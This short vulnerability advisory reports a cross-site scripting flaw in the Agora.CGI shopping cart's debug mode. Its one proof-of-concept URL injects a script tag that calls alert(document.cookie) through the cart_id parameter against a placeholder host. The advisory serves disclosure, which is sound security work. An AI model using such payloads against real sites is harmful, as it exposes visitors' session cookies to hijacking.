Agora.CGI Debug Mode Cross-Site Scripting Vulnerability

Agora.CGI Debug Mode Cross-Site Scripting Vulnerability

"Tamer Sahin" <ts@securityoffice.net> provided the following example:

http://agorasite/store/agora.cgi?cart_id=<script>alert(document
.cookie)</script>&xm=on&product=HTML